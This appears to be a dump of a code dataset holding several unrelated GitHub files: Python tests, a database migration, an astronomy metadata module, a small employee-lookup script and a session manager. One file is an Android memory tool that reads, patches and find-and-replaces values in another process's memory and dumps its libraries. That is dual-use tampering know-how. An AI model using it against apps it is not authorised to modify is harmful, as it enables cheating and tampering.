from JS side\n req = dummy_request()\n # Send the request\n #self.assertEqual(P.sender, None)\n #P.send_json(json_msg)\n G._send(json_msg)\n await P.packer.flush_queue_task\n # attach the web socket to the pipeline, after the send\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # wait for the request to go through\n expect_str = FINISHED_UNICODE + json.dumps(json_msg)\n #await P.packer.flush_queue_task\n ws = cnx.ws\n self.assertEqual(ws._sent, [expect_str])\n if auto_clear:\n self.assertEqual(P.last_unicode_sent, None)\n else:\n self.assertNotEqual(P.last_unicode_sent, None)\n\n async def test_pipelines_a_message_sent_clear(self):\n return await self.test_pipelines_a_message_sent(auto_clear=True)\n\n async def xxxtest_async_iterable(self):\n iterable = AsyncIterable(list(\"abc\"))\n async for d in iterable:\n #p(\"data\", d)\n pass\n\nclass AsyncIterable:\n\n def __init__(self, items):\n self.index = 0\n self.items = items\n\n def __aiter__(self):\n return self\n\n async def __anext__(self):\n data = await self.fetch_data()\n if data:\n return data\n else:\n raise StopAsyncIteration\n\n async def fetch_data(self):\n index = self.index\n self.index = index + 1\n try:\n return self.items[index]\n except IndexError:\n return None\n\n\nclass TestGizmoAsyncSend(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_a_message_received(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n data = []\n def callback_function(*args):\n data.append(args)\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n ws_msg = FINISHED_UNICODE + json.dumps(json_msg)\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n #async for x in cnx.ws:\n # #p(\"for\", x)\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n ws = cnx.ws\n self.assertEqual(data, [tuple(arguments)])\n if auto_clear:\n self.assertEqual(P.last_json_received, None)\n else:\n self.assertNotEqual(P.last_json_received, None)\n self.assertEqual(P.last_unicode_sent, None)\n\nclass TestGizmoAsyncSendClear(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_a_message_received_clear(self, auto_clear=True):\n GW = GizmoWrapper()\n G = GW.G\n data1 = []\n def callback_function(*args):\n #raise IndexError\n if len(data1) > 0:\n raise ValueError\n data1.append(args)\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n ws_msg = FINISHED_UNICODE + json.dumps(json_msg)\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n #async for x in cnx.ws:\n # #p(\"for\", x)\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n ws = cnx.ws\n self.assertEqual(data1, [tuple(arguments)])\n if auto_clear:\n self.assertEqual(P.last_json_received, None)\n else:\n self.assertNotEqual(P.last_json_received, None)\n self.assertEqual(P.last_unicode_sent, None)\n\nclass TestPipelineJsonErr(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_json_err(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n ws_msg = FINISHED_UNICODE + \"xxxgarbage^&%\"\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a \"request\" with the callback\n cnx = FakeWebSocketUnicodeMessages([ws_msg])\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertNotEqual(P.last_json_error, None)\n self.assertNotEqual(P.last_receive_error, None)\n self.assertEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n\nclass TestPipelineWSErr(unittest.IsolatedAsyncioTestCase):\n async def test_pipelines_ws_err(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n ws_msg = FINISHED_UNICODE + \"xxxgarbage^&%\"\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # two error packets cause an assertion error\n cnx = FakeWebSocketUnicodeMessages([ws_msg, ws_msg], msg_type=GZPipeline.MSG_TYPE_ERROR)\n req = dummy_request()\n # attach the web socket to the pipeline\n with self.assertRaises(AssertionError):\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertEqual(P.last_json_error, None)\n self.assertEqual(P.last_receive_error, None)\n self.assertEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n self.assertNotEqual(P.ws_error_message, None)\n","repo_name":"AaronWatters/H5Gizmos","sub_path":"H5Gizmos/python/test/test_H5Gizmos.py","file_name":"test_H5Gizmos.py","file_ext":"py","file_size_in_byte":26572,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39135286884","text":"\"\"\"Allow languages to be managed on web client\n\nRevision ID: 99381175f30e\nRevises: 38e7afa4efe3\nCreate Date: 2022-05-23 03:27:21.084387\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '99381175f30e'\ndown_revision = '38e7afa4efe3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('codes', sa.Column('allowed', sa.Boolean(), nullable=True))\n op.add_column('codes', sa.Column('default', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('codes', 'allowed')\n op.drop_column('codes', 'default')\n # ### end Alembic commands ###\n","repo_name":"ryanwhite04/chengyule","sub_path":"migrations/versions/99381175f30e_allow_languages_to_be_managed_on_web_.py","file_name":"99381175f30e_allow_languages_to_be_managed_on_web_.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"21873443902","text":"\"\"\"\r\n/*\r\n * Date : 2023/09/30\r\n * Version : 0.6\r\n * Author : Abdul Moez\r\n * Email : abdulmoez123456789@gmail.com\r\n * Affiliation : Undergraduate at Government College University (GCU) Lahore, Pakistan\r\n * GitHub : https://github.com/Anonym0usWork1221/android-memorytool\r\n *\r\n * Description:\r\n * This code is governed by the GNU General Public License, version 3 or later.\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program. If not, see .\r\n */\r\n\"\"\"\r\n\r\n# ! /usr/bin/env python\r\nfrom .additional_features import AdditionalFeatures\r\nfrom .ThreadingController import FastSearchAlgo\r\nfrom .libs_read_writers import LibsControllers\r\nfrom .mapping import Mapping\r\nfrom os import cpu_count\r\n\r\n\r\nclass AndroidMemoryToolLinux(FastSearchAlgo):\r\n \"\"\"\r\n This class represents a tool for performing memory-related operations on an Android device. It inherits from the\r\n FastSearchAlgo class.\r\n\r\n Constructor:\r\n\r\n __init__(self, PKG: any((str, int)), TYPE=FastSearchAlgo.DataTypes.DWORD, SPEED_MODE=True, WORKERS=50,\r\n pMAP=FastSearchAlgo.PMAP()) -> None:\r\n Initializes an instance of the AndroidMemoryTool class. It takes the following parameters:\r\n PKG: Package name or ID of the target process.\r\n TYPE: Data type to be used in memory operations (default: FastSearchAlgo.DataTypes.DWORD).\r\n SPEED_MODE: Flag indicating whether speed mode is enabled (default: True).\r\n WORKERS: Number of worker threads to use in search operations (default: 50).\r\n pMAP: Instance of the PMAP class for memory mapping (default: FastSearchAlgo.PMAP()).\r\n\r\n Methods:\r\n\r\n initialize(self, PKG: any((str, int)), TYPE: str, SPEED_MODE: bool,\r\n WORKERS: int, pMAP: FastSearchAlgo.PMAP) -> None:\r\n Initializes the AndroidMemoryTool instance with the specified parameters.\r\n\r\n read_value(self, read: any) -> any: Reads the value at a given memory address. It takes the following parameter:\r\n read: Memory address to read from.\r\n\r\n read_write_value(self, read: any, write: any) -> any:\r\n Reads the value at a given memory address and then writes a new value to that address.\r\n It takes the following parameters:\r\n read: Memory address to read from.\r\n write: Value to write to the memory address.\r\n\r\n write_lib(self, base_address: hex, offset: hex, write_value: any) -> any:\r\n Writes a value to a specific offset in a shared library. It takes the following parameters:\r\n base_address: Base address of the shared library.\r\n offset: Offset within the shared library.\r\n write_value: Value to write to the specified offset.\r\n\r\n read_lib(self, base_address: hex, offset: hex, value: any((str, int, None)) = None) -> any:\r\n Reads a value from a specific offset in a shared library. It takes the following parameters:\r\n base_address: Base address of the shared library.\r\n offset: Offset within the shared library.\r\n value (optional): Value to use for dynamic buffer size calculation (default: None).\r\n\r\n refiner_address(self, list_address: list, value_to_refine: any) -> any:\r\n Refines a list of memory addresses based on a specific value. It takes the following parameters:\r\n list_address: List of memory addresses to refine.\r\n value_to_refine: Value to refine the addresses based on.\r\n\r\n get_module_base_address(pid: str, module_name: str) -> any:\r\n Retrieves the base address of a specific module within a process. It takes the following parameters:\r\n pid: Process ID.\r\n module_name: Name of the module.\r\n\r\n raw_dump(self, lib_name: str, path='./') -> bool:\r\n Dumps the raw binary contents of a shared library. It takes the following parameters:\r\n lib_name: Name of the shared library.\r\n path (optional): Path to save the binary dump (default: './').\r\n\r\n find_hex_pattern(self, hex_pattern: str) -> any:\r\n Searches for a hexadecimal pattern in the memory of the target process. It takes the following parameter:\r\n hex_pattern: Hexadecimal pattern to search for.\r\n\r\n dump_maps(self, path=\"./\") -> bool:\r\n Dumps the memory mapping information of the target process to a file. It takes the following parameter:\r\n path (optional): Path to save the memory mapping file (default: './').\r\n\r\n \"\"\"\r\n _LibControllerObject = LibsControllers()\r\n\r\n def __init__(self, PKG: any((str, int)),\r\n TYPE: str = FastSearchAlgo.DataTypes.DWORD,\r\n SPEED_MODE: bool = True,\r\n WORKERS: int = int(cpu_count() / 2), # half of cores available in operating system\r\n pMAP: FastSearchAlgo.PMAP = FastSearchAlgo.PMAP()\r\n ) -> None:\r\n \"\"\"\r\n _Initializes an instance of the AndroidMemoryTool class. It takes the following parameters:\r\n Args:\r\n PKG: Package name or ID of the target process.\r\n TYPE: Data type to be used in memory operations (default: FastSearchAlgo.DataTypes.DWORD).\r\n SPEED_MODE: Flag indicating whether speed mode is enabled (default: True).\r\n WORKERS: Number of worker threads to use in search operations (default: 50).\r\n pMAP: Instance of the PMAP class for memory mapping (default: FastSearchAlgo.PMAP()).\r\n \"\"\"\r\n super(AndroidMemoryToolLinux, self).__init__()\r\n self._initialize(PKG, TYPE, SPEED_MODE, WORKERS, pMAP)\r\n\r\n def _initialize(self,\r\n PKG: any((str, int)),\r\n TYPE: str,\r\n SPEED_MODE: bool,\r\n WORKERS: int,\r\n pMAP: FastSearchAlgo.PMAP\r\n ) -> None:\r\n \"\"\"\r\n Initializes the AndroidMemoryTool object.\r\n\r\n Args:\r\n PKG: The package name or process ID.\r\n TYPE: The data type to search for. Defaults to FastSearchAlgo.DataTypes.DWORD.\r\n SPEED_MODE: Whether to enable speed mode. Defaults to True.\r\n WORKERS: The number of workers to use for searching. Defaults to 50.\r\n pMAP: The memory map to use. Defaults to FastSearchAlgo.PMAP().\r\n \"\"\"\r\n\r\n super().init_setup(PKG, TYPE, SPEED_MODE, WORKERS)\r\n super().init_tool(pMAP)\r\n\r\n def read_value(self, read: any, is_grouped: bool = False, range_val: int = 512) -> any:\r\n \"\"\"\r\n Reads the value from the specified memory address.\r\n\r\n Args:\r\n read: The memory address to read from.\r\n is_grouped: Check True if you want group search\r\n range_val: For group search the minimal distance between values\r\n\r\n Returns:\r\n The value read from the memory address.\r\n \"\"\"\r\n\r\n # gets if speed mode is on or off\r\n speed_mode = super().get_variables(is_speed=True)\r\n # gets data type bytes in int\r\n data_types = super().get_variables(is_data_byte=True)\r\n # gets PID of running process\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n # If data type is valid continue\r\n if data_types != -1:\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n if isinstance(read, list) and is_grouped:\r\n value_to_read = [self.data_type_encoding(value) for value in read]\r\n else:\r\n value_to_read = super().data_type_encoding(read)\r\n\r\n if data_types == 0:\r\n # Perform Group search\r\n if is_grouped:\r\n print(\"[-] This Data Type is not supported for group search. Yet!\")\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_text(proc_id, maps_addr, value_to_read)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.search_and_read_text(proc_id, maps_addr, value_to_read)\r\n else:\r\n # Perform Group search\r\n if is_grouped:\r\n if speed_mode:\r\n super().fast_group_search_algorithms_value(proc_id, maps_addr, data_types, value_to_read,\r\n range_val)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.group_search_and_read(proc_id, maps_addr, data_types,\r\n value_to_read, range_val)\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_value(proc_id, maps_addr, value_to_read,\r\n data_types)\r\n value = self._SearchAndReadObject.get_readers_values()\r\n self._SearchAndReadObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndReadObject.search_and_read(proc_id, maps_addr, data_types, value_to_read)\r\n\r\n return None\r\n\r\n def read_write_value(self, read: any, write: any, is_grouped: bool = False, range_val: int = 552) -> any:\r\n \"\"\"\r\n Reads the value from the specified memory address and writes the new value to it.\r\n\r\n Args:\r\n read: The memory address to read from.\r\n write: The new value to write.\r\n is_grouped: Check True if you want group search.\r\n range_val: For group search the minimal distance between values.\r\n\r\n Returns:\r\n The value written to the memory address.\r\n \"\"\"\r\n\r\n speed_mode = super().get_variables(is_speed=True)\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n if isinstance(read, list) and is_grouped:\r\n value_to_read = [self.data_type_encoding(value) for value in read]\r\n _, value_to_write = super().data_type_encoding(read[0], write)\r\n else:\r\n value_to_read, value_to_write = super().data_type_encoding(read, write)\r\n\r\n if data_types == 0:\r\n # Perform Group search\r\n if is_grouped:\r\n print(\"[-] This Data Type is not supported for group search. Yet!\")\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_text(proc_id, maps_addr, value_to_read, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.search_and_write_text(proc_id, maps_addr, value_to_read,\r\n value_to_write)\r\n else:\r\n # Perform Group search\r\n if is_grouped:\r\n if speed_mode:\r\n super().fast_group_search_algorithms_value(proc_id, maps_addr, data_types, value_to_read,\r\n range_val, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.group_search_and_write(proc_id, maps_addr, data_types,\r\n value_to_read, value_to_write, range_val)\r\n # Perform Normal search\r\n else:\r\n if speed_mode:\r\n super().fast_search_algorithms_value(proc_id, maps_addr, value_to_read,\r\n data_types, value_to_write)\r\n value = self._SearchAndWriteObject.get_writer_values()\r\n self._SearchAndWriteObject.reset_queue()\r\n return value\r\n\r\n return self._SearchAndWriteObject.search_and_write(proc_id, maps_addr, data_types, value_to_read,\r\n value_to_write)\r\n return None\r\n\r\n def write_lib(self, base_address: str, offset: str, write_value: any) -> any:\r\n \"\"\"\r\n Writes the value to the specified library offset.\r\n\r\n Args:\r\n base_address: The base address of the library.\r\n offset: The offset within the library.\r\n write_value: The value to write.\r\n\r\n Returns:\r\n The value written to the library offset.\r\n \"\"\"\r\n\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n base_address = str(base_address)\r\n offset = str(offset)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n value_to_write = super().data_type_encoding(write_value)\r\n return self._LibControllerObject.write_lib_offsets(proc_id, base_address, offset, value_to_write)\r\n return None\r\n\r\n def read_lib(self, base_address: str, offset: str, value: any((str, int, None)) = None) -> any:\r\n \"\"\"\r\n Reads the value from the specified library offset.\r\n\r\n Args:\r\n base_address: The base address of the library.\r\n offset: The offset within the library.\r\n value: The additional value parameter for certain data types. Defaults to None.\r\n\r\n Returns:\r\n The value read from the library offset.\r\n \"\"\"\r\n\r\n data_types = super().get_variables(is_data_byte=True)\r\n proc_id = super().get_variables(is_pid=True)\r\n base_address = str(base_address)\r\n offset = str(offset)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n if data_types == 0:\r\n if value is None:\r\n print(\"[*] Needed Value parameter\")\r\n return None\r\n\r\n if isinstance(value, int):\r\n buffer = 18 + (2 * int(value))\r\n elif str(value).isnumeric():\r\n buffer = 18 + (2 * int(str(value)))\r\n else:\r\n buffer = 18 + (2 * int(len(str(value))))\r\n\r\n value = self._LibControllerObject.read_lib_offsets(proc_id, base_address, offset, buffer)\r\n if value:\r\n return super().data_type_decoding(value)\r\n\r\n else:\r\n value = self._LibControllerObject.read_lib_offsets(proc_id, base_address, offset, data_types)\r\n if value:\r\n return super().data_type_decoding(value)\r\n return None\r\n\r\n def refiner_address(self, list_address: list, value_to_refine: any) -> any:\r\n \"\"\"\r\n Refines the list of addresses based on the specified value to refine.\r\n\r\n Args:\r\n list_address: The list of addresses to refine.\r\n value_to_refine: The value to refine.\r\n\r\n Returns:\r\n The refined list of addresses.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n data_types = super().get_variables(is_data_byte=True)\r\n value_to_read = super().data_type_encoding(value_to_refine)\r\n\r\n if proc_id == '':\r\n print('[*] Pid not found')\r\n return None\r\n\r\n if data_types != -1:\r\n if data_types == 0:\r\n print(\"[*] Data type not supported\")\r\n else:\r\n return self._LibControllerObject.address_refiners(proc_id, list_address, data_types, value_to_read)\r\n return None\r\n\r\n def get_module_base_address(self, module_name: str) -> any:\r\n \"\"\"\r\n Gets the base address of the specified module for the given process ID.\r\n Args:\r\n module_name: The name of the module.\r\n Returns:\r\n The base address of the module.\r\n \"\"\"\r\n\r\n pid = super().get_variables(is_pid=True)\r\n map_file = open(f\"/proc/{pid}/maps\", 'r')\r\n address = []\r\n if map_file is not None:\r\n for line in map_file.readlines():\r\n line_split = line.split()\r\n if module_name in line_split[len(line_split) - 1]:\r\n address.append(line_split[0].split('-'))\r\n if len(address) < 1:\r\n print(\"[*] Module not found\")\r\n return None\r\n base_address = hex(int(address[0][0], 16))\r\n return base_address\r\n\r\n def raw_dump(self, lib_name: str, path='./') -> bool:\r\n \"\"\"\r\n Dumps the specified library to a raw binary file.\r\n\r\n Args:\r\n lib_name: The name of the library.\r\n path: The path to save the dumped file. Defaults to './'.\r\n\r\n Returns:\r\n True if the dump was successful, False otherwise.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n\r\n if \"-\" in lib_name:\r\n address = lib_name.split(\"-\")\r\n else:\r\n address = Mapping.mapping_dump_libs(proc_id, lib_name)\r\n\r\n if len(address) < 1:\r\n print(\"[*] Module not found\")\r\n return False\r\n\r\n binary_string = self._LibControllerObject.raw_dumper(proc_id, address)\r\n open(f\"{path}{address[0][0]}-{address[len(address) - 1][1]}-{lib_name.replace('.so', '')}.bin\", 'wb') \\\r\n .write(binary_string)\r\n return True\r\n\r\n def find_hex_pattern(self, search_pattern: str) -> any:\r\n \"\"\"\r\n Finds the specified hexadecimal pattern in the memory.\r\n\r\n Args:\r\n search_pattern: The hexadecimal pattern to search for.\r\n\r\n Returns:\r\n The addresses where the pattern was found.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n speed_mode = super().get_variables(is_speed=True)\r\n\r\n filter_user_data = search_pattern.replace(\" \", \"\")\r\n bytes_of_filtered_data = int(len(filter_user_data) / 2)\r\n pattern_of_hex = \"\"\r\n character_counter_hex = 0\r\n for char in filter_user_data:\r\n if char == \"?\":\r\n character_counter_hex += 1\r\n else:\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-Fa-f0-9]{{{character_counter_hex}}}\"\r\n character_counter_hex = 0\r\n if char != \"?\":\r\n pattern_of_hex += char\r\n\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-Fa-f0-9]{{{character_counter_hex}}}\"\r\n if speed_mode:\r\n super().fast_search_algorithms_pattern_finding(proc_id, maps_addr, bytes_of_filtered_data,\r\n pattern_of_hex)\r\n values = self._AdditionalFeaturesObject.get_pattern_finder_values()\r\n self._AdditionalFeaturesObject.reset_queue()\r\n return values\r\n\r\n return AdditionalFeatures.find_hexadecimal_pattern(proc_id, maps_addr, bytes_of_filtered_data, pattern_of_hex)\r\n\r\n def find_and_replace_hex_pattern(self, search_pattern: str, replace_pattern: str) -> any:\r\n \"\"\"\r\n Finds and replaces a hexadecimal pattern in memory addresses.\r\n\r\n Args:\r\n search_pattern (str): The pattern to search for. It can contain hexadecimal digits (0-9, A-F)\r\n and '?' as a wildcard for any single hexadecimal digit.\r\n replace_pattern (str): The pattern to replace the found pattern with.\r\n It should be a valid hexadecimal string.\r\n\r\n Returns:\r\n any: The result of the pattern finding and replacement operation.\r\n The format of the result depends on the 'speed_mode' setting.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n speed_mode = super().get_variables(is_speed=True)\r\n\r\n filter_user_data = search_pattern.replace(\" \", \"\")\r\n replace_pattern = replace_pattern.replace(\" \", \"\")\r\n bytes_of_filtered_data = int(len(filter_user_data) / 2)\r\n pattern_of_hex = \"\"\r\n character_counter_hex = 0\r\n for char in filter_user_data:\r\n if char == \"?\":\r\n character_counter_hex += 1\r\n else:\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-F0-9]{{{character_counter_hex}}}\"\r\n character_counter_hex = 0\r\n if char != \"?\":\r\n pattern_of_hex += char\r\n\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-F0-9]{{{character_counter_hex}}}\"\r\n\r\n if speed_mode:\r\n super().fast_search_algorithms_pattern_finding(proc_id, maps_addr, bytes_of_filtered_data,\r\n pattern_of_hex, replace_pattern)\r\n values = self._AdditionalFeaturesObject.get_pattern_finder_values()\r\n self._AdditionalFeaturesObject.reset_queue()\r\n return values\r\n\r\n return AdditionalFeatures.find_and_replace_hexadecimal_pattern(proc_id, maps_addr,\r\n bytes_of_filtered_data, pattern_of_hex,\r\n replace_pattern)\r\n\r\n def dump_maps(self, path=\"./\") -> bool:\r\n \"\"\"\r\n Dumps the memory maps of the process.\r\n\r\n Args:\r\n path: The path to save the dumped file. Defaults to './'.\r\n\r\n Returns:\r\n True if the dump was successful, False otherwise.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n if proc_id:\r\n map_file = open(f\"/proc/{proc_id}/maps\", \"r\").read()\r\n open(f\"{path}Map_{proc_id}.txt\", \"w\").write(map_file)\r\n return True\r\n\r\n return False\r\n","repo_name":"Anonym0usWork1221/android-memorytool","sub_path":"androidMemoryTool/LinuxAPI/android_memory_tool_linux.py","file_name":"android_memory_tool_linux.py","file_ext":"py","file_size_in_byte":23003,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"78"} +{"seq_id":"9648015296","text":"# 处理员工信息\nsource = \"7782,CLARK,MANAGER,SALES,5000$7934,MILLER,SALESMAN,SALES,3000$7369,SMITH,ANALYST,RESEARCH,2000\"\nemployee_list = source.split(\"$\")\nall_emp = {}\n# 创建员工字典\nfor i in range(0, len(employee_list)):\n # 将单个员工信息的字符串切割成列表\n e = employee_list[i].split(\",\")\n # 创建单个员工信息的字典\n employee = {\"no\": e[0], \"name\": e[1], \"job\": e[2], \"department\": e[3], \"salary\": e[4]}\n # 每次循环都将新创建的字典添加到新的字典里面\n all_emp[employee[\"no\"]] = employee\n\nemp_no = input(\"请输入需要查询的员工编号:\")\nif emp_no in all_emp:\n emp = all_emp[emp_no] # 字典取值\n print(\"工号:{no},姓名:{name},职位:{job},部门:{department},薪资:{salary}\".format_map(emp))\nelse:\n print(\"编号错误,请重新输入!\")\n\n\n\n","repo_name":"Anory/Python_projeck","sub_path":"dict_test/sample4.py","file_name":"sample4.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4348403185","text":"from typing import List\nfrom astropy.coordinates import SkyCoord\nfrom star_description import StarMetaData\n\n\nclass UpsilonData(StarMetaData):\n def __init__(\n self, key=\"UPSILON\", var_type=None, probability=None, flag=None, period=None\n ):\n super().__init__(key)\n self.var_type = var_type\n self.probability = probability\n self.flag = flag\n self.period = period\n\n def get_upsilon_string(self):\n # extract upsilon strings from star_descr\n # might have to move outside of UpsilonMatch\n return \"\\nVar: prob={0:.2f}({1}),type={2}\".format(\n self.probability, self.flag, self.var_type\n )\n\n def __repr__(self):\n return (\n f\"Key:{self.key}, Var Type:{self.var_type}, Probability:{self.probability},\"\n f\" flag:{self.flag}, Period:{self.period}\"\n )\n\n def __str__(self):\n return (\n f\"Key:{self.key}, Var Type:{self.var_type}, Probability:{self.probability},\"\n f\" flag:{self.flag}, Period:{self.period}\"\n )\n\n\nclass CompStarData(StarMetaData):\n def __init__(self, compstar_ids: List[int], key=\"COMPSTARS\", extra_id=-1):\n super().__init__(key)\n self.compstar_ids = compstar_ids\n # extra star which is also constant, and can be used as K star for AAVSO ensemble calculations\n self.extra_id = extra_id\n\n def __repr__(self):\n return f\"Key:{self.key}, Compstars: {self.compstar_ids}\"\n\n def __str__(self):\n return f\"Key:{self.key}, Compstars: {self.compstar_ids}\"\n\n\nclass SelectedFileData(StarMetaData):\n def __init__(self, key=\"SELECTEDTAG\"):\n super().__init__(key)\n\n\nclass SiteData(StarMetaData):\n def __init__(\n self,\n minmax: str = None,\n vsx_var_flag=None,\n separation: float = None,\n var_min=None,\n var_max=None,\n var_type: str = None,\n our_name: str = None,\n period: float = None,\n period_err: str = None,\n source: str = None,\n epoch: str = None,\n comments: str = None,\n key=\"SITE\",\n ):\n super().__init__(key)\n self.minmax = self._strip_if_string(minmax)\n self.vsx_var_flag = self._strip_if_string(vsx_var_flag)\n self.separation = separation\n self.var_min = var_min\n self.var_max = var_max\n self.var_type = self._strip_if_string(var_type)\n self.our_name = self._strip_if_string(our_name)\n self.period = period\n self.period_err = period_err\n self.source = source\n self.epoch = epoch\n self.comments = comments\n\n @staticmethod\n def _strip_if_string(arg, is_nan=True):\n return arg.strip() if (arg is not None and isinstance(arg, str)) else arg\n\n def __repr__(self):\n return (\n f\"Key:{self.key}, {self.minmax} {self.var_min}-{self.var_max} \"\n f\"{self.var_type} {self.our_name} {self.period} {self.period_err} {self.epoch}\"\n )\n\n def __str__(self):\n return self.__repr__()\n\n\nclass CatalogData(StarMetaData):\n def __init__(\n self,\n key=None,\n catalog_id=None,\n name=None,\n coords: SkyCoord = None,\n separation=-1,\n vmag=None,\n vmag_err=None,\n extradata=None,\n ):\n # the name of the catalog\n super().__init__(key)\n # the id in the catalog\n self.catalog_id = catalog_id\n # the name of the object in this catalog\n self.name = name\n # the coords in the catalog\n self.coords = coords\n # the separation between the vast coords and the catalog coords\n self.separation = separation\n # the visual magnitude\n self.vmag = vmag\n # the visual magnitude error\n self.vmag_err = vmag_err\n # optional extra info on the catalog object\n self.extradata = extradata\n\n def get_name_and_separation(self):\n return self.name, self.separation\n\n def __repr__(self):\n return (\n f\"Catalog:{self.key}, CatalogId:{self.catalog_id}, Name:{self.name}, \"\n f\"Coords:{self.coords}, Separation:{self.separation}\"\n )\n\n def __str__(self):\n return (\n f\"Catalog:{self.key}, CatalogId:{self.catalog_id}, Name:{self.name}, \"\n f\"Coords:{self.coords}, Separation:{self.separation}\"\n )\n\n\n#\n# class DataTypes:\n# upsilondata = UpsilonData.key\n# sitedata = SiteData.key\n# compstardata = CompStarData.key\n# selectedfiledata = SelectedFileData.key\n","repo_name":"mrosseel/vast-automation","sub_path":"src/star_metadata.py","file_name":"star_metadata.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12030351861","text":"\"\"\"\nSessionManager class\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any, Dict\n\nimport json\nimport time\n\nfrom asyncache import cached\nfrom cachetools import TTLCache\nfrom pydantic import BaseModel\n\nfrom featurebyte.enum import SourceType\nfrom featurebyte.logging import get_logger\nfrom featurebyte.models.credential import CredentialModel\nfrom featurebyte.models.feature_store import FeatureStoreModel\nfrom featurebyte.query_graph.node.schema import DatabaseDetails\nfrom featurebyte.session.base import BaseSession\nfrom featurebyte.session.databricks import DatabricksSession\nfrom featurebyte.session.snowflake import SnowflakeSession\nfrom featurebyte.session.spark import SparkSession\nfrom featurebyte.session.sqlite import SQLiteSession\n\nSOURCE_TYPE_SESSION_MAP = {\n SourceType.SQLITE: SQLiteSession,\n SourceType.SNOWFLAKE: SnowflakeSession,\n SourceType.DATABRICKS: DatabricksSession,\n SourceType.SPARK: SparkSession,\n}\n\nsession_cache: TTLCache[Any, Any] = TTLCache(maxsize=1024, ttl=600)\n\n\nlogger = get_logger(__name__)\n\n\nasync def get_new_session(item: str, credential_params: str) -> BaseSession:\n \"\"\"\n Create a new session for the given database source key\n\n Parameters\n ----------\n 